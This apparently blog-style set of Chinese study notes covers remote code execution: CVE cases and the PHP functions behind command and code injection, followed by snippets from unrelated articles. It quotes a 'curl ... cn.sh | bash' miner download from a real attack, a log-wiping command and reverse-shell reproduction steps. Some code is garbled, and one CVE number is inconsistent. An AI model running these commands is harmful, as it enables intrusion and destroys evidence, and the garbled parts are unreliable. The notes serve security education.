RCE学习
一、远程代码执行漏洞
1. 远程代码执行的定义
- 定义:远程代码执行漏洞(Remote Code Execute,简称RCE)是指程序预留了执行命令或代码的接口并被黑客利用的漏洞。广义上也包括远程命令执行(Remote Command Execute)和命令注入漏洞。
- 产生原因:由于业务需求设计需要执行外部命令或代码的接口,但未对用户输入进行严格校验和限制。
- 危害等级:属于高危漏洞,CVSSv3评分可达9.8分(如CVE-2021-3177)。
2. 远程代码执行漏洞的应用
1)典型应用场景
- 网络设备管理界面:如路由器、防火墙的ping测试功能界面
- 自动化运维系统:网页端直接执行服务器命令的接口
- 数据库管理后台:允许执行SQL语句的运维界面(需注意限制delete/update等危险操作)
2)漏洞危害
- 服务器控制:获取系统权限执行任意命令
- 数据泄露:读取网站源码、用户数据等敏感文件
- 恶意文件操作:写入webshell、植入挖矿木马(如MimuMiner家族)
- 横向渗透:通过SSH连接在内网横向移动
- 日志清除:使用cat /dev/null > /var/log/secure等命令清除攻击痕迹
3)例题:Atlassian Confluence漏洞
- 题目解析
- 漏洞编号:CVE-2021-26084
- 攻击方式:通过构造恶意请求执行curl hxxp://190.144.115.54:443/cn.sh | bash下载挖矿脚本
- 攻击特征:
- 清除竞品挖矿进程(如4SHMiner、H2Miner)
- 使用hostname作为矿池用户名密码
- 通过/var/tmp/mimu目录驻留恶意程序
- 防御措施:腾讯T-Sec主机安全专业版可拦截此类攻击
4)例题:Apache Druid远程代码执行漏洞
- 题目解析
- 影响版本:Apache Druid < 0.20.1
- 漏洞原理:通过构造恶意JSON请求执行JavaScript代码
- 复现步骤:
- 使用Docker搭建环境:docker pull fokkodriesprong/docker-druid
- 修改filter参数注入java.lang.Runtime.getRuntime().exec()
- 通过nc监听获取反弹shell
- 修复建议:升级至0.20.1及以上版本
3. 实际漏洞案例分析
1)例题:Python远程代码执行漏洞
- 题目解析
- 漏洞编号:CVE-2021-3177
- 影响版本:Python 3.x-3.9.1
- 利用方式:通过ctypes库造成缓冲区溢出
- 修复方案:升级至Python 3.6.13/3.7.10/3.8.8/3.9.2
2)例题:VMware远程代码执行漏洞
- 题目解析
- 漏洞编号:CVE-2021-21972
- 攻击向量:通过443端口构造恶意请求
- 影响产品:
- vCenter Server 7.0系列<7.0U1c
- VMware Cloud Foundation 4.x<4.2.3
- 关联漏洞:CVE-2021-21974(ESXi堆溢出)、CVE-2021-21973(SSRF)
3)例题:深信服EDR远程命令执行漏洞
- 题目解析
- 漏洞编号:CNVD-2020-46552
- 影响版本:EDR v3.2.16/3.2.17/3.2.19
- 利用特点:
- 默认root权限运行
- 可通过构造特殊请求包执行系统命令
- 常被用于植入挖矿木马
- 修复方案:升级到最新安全版本
4)例题:网康科技防火墙RCE漏洞
- 题目解析
- 漏洞编号:CNVD-2021-30101
- 攻击方式:向/directdata/direct/router发送恶意POST请求
- 后续利用:通过http://x.x.x.x/cmd.txt获取命令执行结果
- 防御建议:部署WAF拦截异常请求
二、知识小结
| 知识点 | 核心内容 | 考试重点/易混淆点 | 难度系数 |
| 远程代码执行漏洞(RCE)定义 | 程序预留执行命令/代码的接口被外部用户滥用,导致黑客控制服务器 | 区分RCE与命令注入漏洞(广义上可归为同类) | ⭐⭐ |
| PHP语言中的RCE风险函数 | 未明确列举具体函数,但强调未严格校验用户输入是根本原因 | eval()等危险函数的使用场景 | ⭐⭐⭐ |
| 外部靶场案例(DVWA/Pikachu) | 通过综合靶场演示RCE漏洞的实际利用方式 | 靶场环境搭建与漏洞复现步骤 | ⭐⭐ |
| 在线CTF平台实践 | 通过实战平台体验RCE漏洞的危害(如获取服务器权限、数据泄露等) | 反弹Shell构造与权限维持技术 | ⭐⭐⭐⭐ |
| 漏洞修复与防御 | 未展开具体措施,但强调输入校验和最小权限原则 | 安全开发规范与WAF规则配置 | ⭐⭐ |
| RCE危害案例(Confluence漏洞) | 攻击者利用漏洞植入挖矿程序、清除日志、横向移动 | 漏洞利用链分析(从RCE到持久化控制) | ⭐⭐⭐⭐ |
| 知名软件RCE漏洞(Python/VMware/Apache) | Python语言自身漏洞、VMware vCenter未授权访问、Apache数据库漏洞 | CVE编号关联(如CVE-2023-21972) | ⭐⭐⭐ |
| 安全软件自身RCE漏洞(深信服/网康) | 终端管理系统/防火墙因界面未过滤输入导致Root权限被获取 | 安全产品反被利用的讽刺性风险 | ⭐⭐⭐⭐ |
一、远程代码执行涉及函数
1. 命令注入
- 分类依据:PHP中造成RCE漏洞的函数分为命令注入和代码注入两类,对应RCE漏洞的两种别名(远程命令执行/远程代码执行)
- 典型函数:
- system():执行操作系统命令并输出结果,与eval()并列为文件上传漏洞的"罪魁祸首"
- exec()/shell_exec():通过shell环境执行命令并将完整输出以字符串返回
- proc_open():执行命令并打开用于输入/输出的文件指针
- popen():打开进程文件指针
- passthru():执行外部程序并显示原始输出
- pcntl_exec():在当前进程空间执行指定程序
1)示例分析
- 漏洞场景:靶场中通过输入IP执行ping命令的功能
- 漏洞成因:直接使用shell_exec()拼接用户输入的IP参数($ip),未做过滤处理
- 关键代码:
result.=shellexec(′ping′.result.=shell_exec('ping '.result.=shellexec(′ping′.
ip); // Windows系统
result.=shellexec(′ping−c4′.result.=shell_exec('ping -c 4 '.result.=shellexec(′ping−c4′.
ip); // 其他系统
- **利用方式**:通过命令分隔符(如`;`、`&&`)注入额外命令 ##### 2. 代码注入 <timestamp>137000</timestamp> - <img src="https://xact01.baidupcs.com/file/p-c6a8c1722728b11482b82853f164d5ce-40-2025042100-3?bkt=en-3de6f374fcad9f514a94920d227b7f50&fid=282335-250528-&time=1745490831&sign=FDTAXUVGEQlBHSKfWqij-GBWOGYTBgG0KqHy7wNbwoLTVMyJyK6xE-QWA8nYcomq5bmTtOKseTyqwVgJg%3D&to=125&size=10&sta_dx=10&sta_cs=0&sta_ft=&sta_ct=7&sta_mt=7&fm2=MH%2CXian%2CAnywhere%2C%2C%E5%9B%9B%E5%B7%9D%2Cct&ctime=0&mtime=0&dt3=0&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=10&vuk=0&iv=2&vl=0&htype=&randtype=&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-790f9c151068f14d1678a1d5b88d45c1b9c452cea603af868b73292470beba738c7294e95218d3a1e88d043170e8f64b867c5a44176a4cf4305a5e1275657320&expires=8h&r=539704602&vbdid=-&fin=p-c6a8c1722728b11482b82853f164d5ce-40-2025042100-3&fn=p-c6a8c1722728b11482b82853f164d5ce-40-2025042100-3&rtype=1&dp-logid=332885767212816930&dp-callid=0.1&hps=1&tsl=0&csl=0&fsl=-1&csign=dmayhhcqdS1jXSxjkf6DN1P7N8o%3D&so=0&ut=1&uter=-1&serv=-1&uc=3989653264&ti=83f2b583554fba15962799e45bad74b34ebcbfd45e914e30&hflag=30&from_type=&adg=n&reqlabel=250528_n_84960de24d75530aeb52ede24f1901ae_0_51404d021002501c7cc73a93072a7338&chkv=5&bid=250528&by=themis" data-ilink="http://yq.newbcs.bae.baidu.com/rest/2.0/poms/bcs?sign=MBOT:UmxSaFNWRVpHVlcxMFIx:aDCJ5xwKYyLMWldLsR6u1YSTIMk%3D&method=download&bucket=ai-note-store&object=/p-c6a8c1722728b11482b82853f164d5ce-40-2025042100-3&time=1745498031"> - **核心函数**: - **eval()**:将字符串作为PHP代码执行 - **assert()**:检查断言时先执行代码(常用于单元测试) - **preg_replace()**:执行正则替换时可能执行代码 - **create_function()**:创建匿名函数 - **call_user_func()/call_user_func_array()**:回调函数调用 - **usort()/uasort()**:使用自定义比较函数排序数组 - **执行机制**: - **eval示例**:直接执行输入的PHP函数命令 - **assert特点**:需要先执行代码才能得到true/false结果 - **create_function**:返回匿名函数名供后续调用 - **风险场景**: - 用户输入直接拼接到正则替换模式 - 动态函数调用未做白名单限制 - 排序函数使用未验证的用户自定义比较器 #### 二、知识小结 | 知识点 | 核心内容 | 考试重点/易混淆点 | 难度系数 | |--------|----------|--------------------|----------| | **PHP命令注入相关函数** | system函数可执行操作系统命令,与eval函数常被用于漏洞利用 | **system与eval的区别**:system执行OS命令,eval执行PHP代码 | ⭐⭐⭐⭐ | | shell_exec/exe函数 | 通过shell环境执行命令并获取返回结果,案例:picature插件中的ping命令实现 | 与system函数的**返回值处理差异** | ⭐⭐⭐ | | pcntl_exec/passthru | 在进程空间执行程序/显示原始输出 | **进程控制与直接输出的区别** | ⭐⭐⭐⭐ | | popen/proc_open | 通过文件指针进行进程I/O控制 | **资源句柄管理**易引发内存泄漏 | ⭐⭐⭐⭐ | | **代码注入相关函数** | eval直接执行输入代码,assert通过断言检查执行代码 | **eval与assert的防御策略差异** | ⭐⭐⭐⭐⭐ | | preg_replace | 正则替换时执行代码(需/e修饰符) | **历史版本兼容性问题** | ⭐⭐⭐ | | create_function | 创建匿名函数导致注入风险 | **闭包函数的替代方案** | ⭐⭐⭐⭐ | | call_user_func_array | 动态回调函数引发的执行链问题 | **参数过滤关键点** | ⭐⭐⭐⭐ | | 数组排序类函数 | usort等通过自定义比较函数引入执行点 | **回调函数的安全验证** | ⭐⭐⭐ |
相关文章:
RCE学习
一、远程代码执行漏洞 1. 远程代码执行的定义 定义:远程代码执行漏洞(Remote Code Execute,简称RCE)是指程序预留了执行命令或代码的接口并被黑客利用的漏洞。广义上也包括远程命令执行(Remote Command Execute&…...
Redis安装及入门应用
应用资料:https://download.csdn.net/download/ly1h1/90685065 1.获取文件,并在该文件下执行cmd 2.输入redis-server-lucifer.exe redis.windows.conf,即可运行redis 3.安装redis客户端软件 4.安装后运行客户端软件,输入链接地址…...
【棒球运动】户外运动安全技巧·棒球1号位
以棒球运动为例,在棒球这项结合力量、速度与策略的户外运动中,安全防护是保障运动表现的核心。以下是针对棒球特点的户外安全指南,涵盖装备、环境与行为规范三大维度: 一、场景化防护装备选择 击球场景 击球手需佩戴双重防护头盔…...
卸载rpm包
昨天了解了查询rpm包的流程和命令,那么今天了解一下删除rpm包的语法,那么话不多说,来看. 1.基本语法 rpm -e RPM包的名称 注:e erase擦除 2.案例 删除firefox软件包 :rpm -e firefox 3.细节讨论 1.如果其它软件包依赖于要卸载的软件包,卸载时…...
【AI提示词】艺人顾问
提示说明 专业艺人顾问,专注于为客户提供全面的艺术、娱乐和商业咨询服务,帮助他们在竞争激烈的行业中树立品牌影响力,提升市场竞争力 提示词 # Role: 艺人顾问## Profile - language: 中文 - description: 专业艺人顾问,专注于…...
第七部分:向量数据库和索引策略
什么是矢量数据库? 简单来说,向量数据库是一种专门化的数据库,旨在优化存储和检索以高维向量形式表示的文本。 为什么这些数据库对RAG至关重要?因为向量表示能够在大规模文档库中进行高效的基于相似性的搜索,根据用户…...
26考研|数学分析:数项级数
数项级数这一章的开始,开启了新的关于“级数”这一新的概念体系的学习进程,此部分共包含四章的内容,分别为数项级数、函数项级数、幂级数以及傅里叶级数。这一章中,首先要掌握级数的相关概念与定义,重难点在于掌握判断…...
2025 年免费 Word 转 PDF 转换器有哪些?
我们列出了最好的 Word 到 PDF 转换器,以便轻松轻松地将 .doc 文件导出到 .pdf 而不会丢失原始格式。 尽管 Microsoft 365 包含一个 Word 版本,该版本可以将您正在处理的 .docx 文档无缝导出为 PDF 格式,但仍在使用旧版 Word 的人可能缺少此…...
【Spring Boot】深入解析:#{} 和 ${}
1.#{} 和 ${}的使用 1.1数据准备 1.1.1.MySQL数据准备 (1)创建数据库: CREATE DATABASE mybatis_study DEFAULT CHARACTER SET utf8mb4;(2)使用数据库 -- 使⽤数据数据 USE mybatis_study;(3ÿ…...
SpringMVC知识体系
SpringMVC 知识体系 1. SpringMVC 基础 MVC 设计模式 Model: 模型层,处理业务逻辑View: 视图层,负责界面展示Controller: 控制层,处理请求并协调模型和视图 核心组件 DispatcherServlet: 前端控制器HandlerMapping: 处理器映射Controller: …...
如何将 PDF 中的文本提取为 JSON 格式
一些 PDF 文件是“带标签”的,意味着它们包含关于文件结构的信息。这种结构作为元数据嵌入在 PDF 中,由一系列标签组成,用于标记诸如标题、段落、列表、表格和图像等元素。 这非常类似于 HTML,其中的文本包含在具有语义意义的元素…...
深度解析:基于Python的微信小程序自动化操作实现
引言 在当今数字化时代,自动化技术正在改变我们与软件交互的方式。本文将深入解析一个使用Python实现的微信小程序自动化操作脚本,该脚本能够自动识别屏幕上的特定图像并执行点击操作。这种技术在自动化测试、批量操作和效率工具开发中有着广泛的应用前…...
【网络安全】网络钓鱼的类型
1. 网络钓鱼简介 网络钓鱼是最常见的社会工程学类型之一,它是一种利用人为错误来获取私人信息、访问权限或贵重物品的操纵技术。之前,您学习了网络钓鱼是如何利用数字通信诱骗人们泄露敏感数据或部署恶意软件的。 有时,网络钓鱼攻击会伪装成…...
)
Python----深度学习(基于深度学习Pytroch线性回归和曲线回归)
一、引言 在当今数据驱动的时代,深度学习已成为解决复杂问题的有力工具。它广泛应用于图像识别、自然语言处理和预测分析等领域。回归分析是统计学的一种基础方法,用于描述变量之间的关系。通过回归模型,我们可以预测连续的数值输出…...
重构智能场景:艾博连携手智谱,共拓智能座舱AI应用新范式
2025年4月24日,智能座舱领域创新企业艾博连科技与国产大模型独角兽智谱,在上海国际车展艾博连会客厅签署合作协议。双方宣布将深度整合智谱在AI大模型领域的技术积淀与艾博连在汽车智能座舱场景的落地经验,共同推进下一代"有温度、懂需求…...
Streamlit从入门到精通:构建数据应用的利器
在数据科学与机器学习日益普及的今天,如何快速将模型部署为可交互的应用成为了许多数据科学家的重要任务。Streamlit,作为一个开源的Python库,专为数据科学家设计,能够帮助我们轻松构建美观且直观的Web应用。本文将从入门到精通&a…...
)
4.1.1 类的序列化与反序列化(XmlSerializer)
本文介绍XML序列化和反序列化操作 本例子中被序列化的类(Devices)中有一个List,其元素类型为:DigitalInputInfo. 序列化以及反序列化都很简单: 序列化:即把类的对象输出到文件中。 StreamWriter streamWriter new StreamWriter(filePath); …...
新增优惠券
文章目录 概要整体架构流程技术细节小结 概要 接口分析 一个基本的新增接口,按照Restful风格设计即可,关键是请求参数。之前表分析时已经详细介绍过这个页面及其中的字段,这里不再赘述。 需要特别注意的是,如果优惠券限定了使…...
Qt 处理 XML 数据
在 Qt 中,处理 XML 数据通常使用 Qt 提供的 QDomDocument、QXmlStreamReader 和 QXmlStreamWriter 类。这些类可以帮助你读取、修改和写入 XML 数据。 1. 使用 QDomDocument 处理 XML QDomDocument 提供了对 XML 文档的 DOM(Document Object Model&…...
)
STM32F407使用ESP8266实现阿里云OTA(下)
文章目录 前言一、函数分析1.get_bin()函数2.download_bin()函数3.串口1中断函数二、完整工程分析前言 从上一章中,我们已经成功连接阿里云并且成功拿到了升级包的下载地址,在本文我们将升级包下载下来并且存储到SD卡中,最终将程序写入FLASH中完成APP的跳转,至此我们的OTA…...
)
树型结构(知识点梳理及例题精讲)
大家好啊,这一集,我们来学习树型结构,请确保看完预习篇,再来看此篇哦 树型结构(预习课)-CSDN博客 话不多说,直接开讲 -------------------------------------------------------分割线-------…...
使用HYPRE库并行装配IJ稀疏矩阵指南: 矩阵预分配和重复利用
使用HYPRE库并行装配IJ稀疏矩阵指南 HYPRE是一个流行的并行求解器库,特别适合大规模稀疏线性系统的求解。下面介绍如何并行装配IJ格式的稀疏矩阵,包括预先分配矩阵空间和循环使用。 1. 初始化矩阵 首先需要创建并初始化一个IJ矩阵: #incl…...
win11什么都不动之后一段时间黑屏桌面无法显示,但鼠标仍可移动,得要熄屏之后才能进入的四种解决方法
现象: 1. 当时新建运行的资源管理器的任务卡了或者原本资源管理器卡了 比如:当时在文本框中输入explorer 注:explorer.exe是Windows的文件资源管理器,它用于管理Windows的图形外壳,包括桌面和文件管理 按住CtrlAltEs…...
C语言编程--15.四数之和
题目: 给你一个由 n 个整数组成的数组 nums ,和一个目标值 target 。请你找出并返回满足下述全部条件且不重复的四元组 [nums[a], nums[b], nums[c], nums[d]] (若两个四元组元素一一对应,则认为两个四元组重复)&…...
从单机工具到协同平台:开源交互式模拟环境的技术演进之路
从单机工具到协同平台:开源交互式模拟环境的技术演进之路 一、引言:从“孤岛”到“生态”的模拟技术变革 二十年前,模拟软件如LAMMPS(分子动力学)、ANSYS(工程仿真)以单机版为主,用…...
Python函数与模块笔记
Python函数与模块笔记 目录 函数 无参函数带参函数变量作用域Lambda函数常用内置函数 模块与包 模块的定义与导入包的使用常用模块(keyword、random、sys、time) 一、函数 1. 无参函数 定义语法: def 函数名(): 代码块 return [表达式]…...
Jenkins:开启高效软件开发的魔法之门
一、Jenkins 是什么 Jenkins 是一款基于 Java 开发的开源持续集成工具,在软件开发流程中占据着举足轻重的地位。它的前身是 Hudson ,于 2004 年由 Sun 公司的 Kohsuke Kawaguchi 开发,2011 年因商标纠纷更名为 Jenkins。发展至今,…...
正则表达式学习指南
正则表达式学习指南 在编程的世界里,正则表达式(Regular Expressions,简称regex)是一门不可或缺的艺术,它赋予了开发者强大的文本处理能力,让看似复杂的字符串匹配和替换任务变得简单而高效。本文旨在为初…...
React-组件通信
1、父子组件通信 (1)父传子(props 传值) // 父组件 function App() {const name 张三return (<div className"App"><Son name{name} /></div>); }// 子组件 function Son(props) {return (<div…...
)
MuJoCo 机械臂 PPO 强化学习逆向运动学(IK)
视频讲解: MuJoCo 机械臂 PPO 强化学习逆向运动学(IK) 代码仓库:https://github.com/LitchiCheng/mujoco-learning 结合上期视频,我们安装了stable_baselines3和gym,今天用PPO尝试强化学习得到关节空间到达…...
代码随想录算法训练营第一天:数组part1
今日学习的文章链接和视频链接 ● 自己看到题目的第一想法 ● 看完代码随想录之后的想法 ● 自己实现过程中遇到哪些困难 ● 今日收获,记录一下自己的学习时长 状态 思路理解完成 30% 代码debug完成 60% 代码模板总结并抽象出来 100% 题目 704 二分查找 题目链接…...
排序与变序算法)
C++学习:六个月从基础到就业——STL算法(二)排序与变序算法
C学习:六个月从基础到就业——STL算法(二)排序与变序算法 本文是我C学习之旅系列的第二十六篇技术文章,也是第二阶段"C进阶特性"的第四篇,主要介绍C STL算法库中的排序和变序算法。查看完整系列目录了解更多…...
JVM性能优化之年轻代参数设置
一、引言 在Java应用开发中,性能问题往往是最难预测却又最影响用户体验的关键因素。即便代码逻辑完美,若JVM(Java虚拟机)配置不当,也可能导致频繁GC停顿、内存泄漏,甚至引发系统崩溃。JVM性能优化并非简单…...
A*迷宫寻路
二、实验内容 以寻路问题为例实现A*算法的求解程序,设计两种不同的估价函数: 1.设置两种地图: 根据题意,用矩阵设置两个地图。 地图1:设置5行5列的迷宫,代码如下: 地图2:设置20行…...
秒出PPT推出更强版本,AI PPT工具进入新纪元!
在现代职场中,PPT是我们沟通和展示信息的重要工具。无论是做产品演示,还是准备工作汇报,一份精美的PPT能大大提升演示效果。然而,传统的PPT制作往往需要消耗大量时间,尤其是在排版、设计和内容调整上。如今,…...
electron-updater实现自动更新
electron-updater 是一个专为 Electron 应用设计的自动更新工具,能够帮助开发者轻松实现跨平台的自动更新功能。它支持 Windows、macOS 和 Linux 系统,通过简单的配置即可集成到 Electron 应用中,自动检查应用的最新版本并在后台完成更新。el…...
Ubuntu22学习记录
Ubuntu22学习记录 虚拟机挂载共享文件夹离线安装.net core3.1离线安装mysql离线安装supervisor离线安装nginx开机自启 虚拟机挂载共享文件夹 sudo vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other 挂载路径:/mnt/hgfs/离线安装.net core3.1 离线安装mysql 离线安装…...
)
【MinerU】:一款将PDF转化为机器可读格式的工具——RAG加强(Docker版本)
目录 创建容器 安装miniconda 安装mineru CPU运行 GPU加速 多卡问题 创建容器 构建Dockerfile文件 开启ssh服务,设置密码为1234等操作 # 使用官方 Ubuntu 24.04 镜像 FROM ubuntu:24.04# 安装基础工具和SSH服务 RUN apt-get update && \apt-get ins…...
leetcode 69和367
69. Sqrt(x) 代码: class Solution { public:int mySqrt(int x) {int left 0;int right x;long long mid 0;int res 0;long long temp 0;while(left < right){mid left ((right - left)>>1);temp mid*mid;if(temp x){res mid;break;}else if(te…...
# 代码随想录算法训练营Day37 | Leetcode300.最长递增子序列、674.最长连续递增序列、718.最长重复子数组
代码随想录算法训练营Day37 | Leetcode300.最长递增子序列、674.最长连续递增序列、718.最长重复子数组 一、最长递增子序列 相关题目:Leetcode300 文档讲解:Leetcode300 视频讲解:Leetcode300 1. Leetcode300.最长递增子序列 给你一个整数数…...
中小企业技术跃迁:云原生后端如何实现高效低成本系统建设
📝个人主页🌹:一ge科研小菜鸡-CSDN博客 🌹🌹期待您的关注 🌹🌹 一、引言:技术变革的“门槛”能否被跨越? 过去十年,云计算与容器化技术飞速发展,互联网巨头纷纷构建自己的云原生基础设施,实现系统模块化、弹性伸缩、自动化运维。然而,中小企业在这股浪潮中…...
系统架构师2025年论文《系统架构风格2》
论软件系统架构风格 摘要: 某市医院预约挂号系统建设推广应用项目是我市卫生健康委员会 2019 年发起的一项医疗卫生行业信息化项目,目的是实现辖区内患者在辖区各公立医疗机构就诊时,可以通过多种线上渠道进行预约挂号。我作为系统架构师参与此项目。本文围绕软件系统架构…...
Java面试实战:电商场景下的Spring Cloud微服务架构与缓存技术剖析
第一轮提问 面试官: 谢飞机,我们先从基础问题开始。请问你知道Spring Boot和Spring Cloud的区别吗? 谢飞机: 当然知道!Spring Boot主要用于快速构建独立运行的Spring应用,而Spring Cloud则是在Spring Boot的基础上实现分布式系统…...
快速配置linux远程开发-go语言
1.go安装包安装 2.go env 配置 go env -w GO111MODULEon go env -w GOPROXYxx go env -w GOSUMDBoff go env -w GOPRIVATExx 3.复制linux公钥到gitlab中,用于通过ssh免密拉取gitlab项目 ssh-keygen -t rsa -b 4096 -C "your_emailexample.com" 4.设置…...
C++23文本编码革新:迈向更现代的字符处理
文章目录 一、字符集与编码(P2314R4)二、统一的字符字面量编码(P2316R2)三、具名通用字符转义(P2071R2)四、带分隔的转义序列(P2290R3)五、支持UTF-8作为可移植源文件编码࿰…...
CentOS系统中MySQL安装步骤分享
在 CentOS 系统上安装 MySQL,需要依次进行环境检查、软件源配置、安装 MySQL、启动服务等操作。我将按照规范流程,为你详细分享完整且具体的安装步骤。 在 CentOS 系统中安装 MySQL 数据库,能够为各类应用提供高效稳定的数据存储和管理服务。…...
【产品经理从0到1】Axure介绍
01. 上期内容回顾 创建元件库的时候,在添加原件时不知道怎么操作。讲解很耐心,希望课上分解步骤多带着练习下;PC 端的原型,相对于移动端,非常自由,没有任何的设计规范;但是,要求 PC…...
30天通过软考高项-第二天
30天通过软考高项-第二天 任务:项目立项管理、项目整合管理 思维导图阅读 知识点记忆 章节习题练习 知识点练习 手写回忆ITTO 立项管理-背 1. 项目可研的5个方面 基金社运法 技术可行性、经济可行性、社会效益可行性、运行环境可行性、其他(法律、政…...
yt-dlp 下载时需要 cookie
下载 b 站 歌曲 yt-dlp -x --proxy http://127.0.0.1:1080 --audio-format mp3 https://www.bilibili.com/video/BV1Zn4y1X75b解决方案,使用 firefox 登录相关网站 yt-dlp -o "downloads/%(title)s.%(ext)s" -f "bestvideo[height<1080]bestaud…...
快速上手GO的net/http包,个人学习笔记
更多个人笔记:(仅供参考,非盈利) gitee: https://gitee.com/harryhack/it_note github: https://github.com/ZHLOVEYY/IT_note 针对GO中net/http包的学习笔记 基础快速了解 创建简单的GOHTTP服务 func …...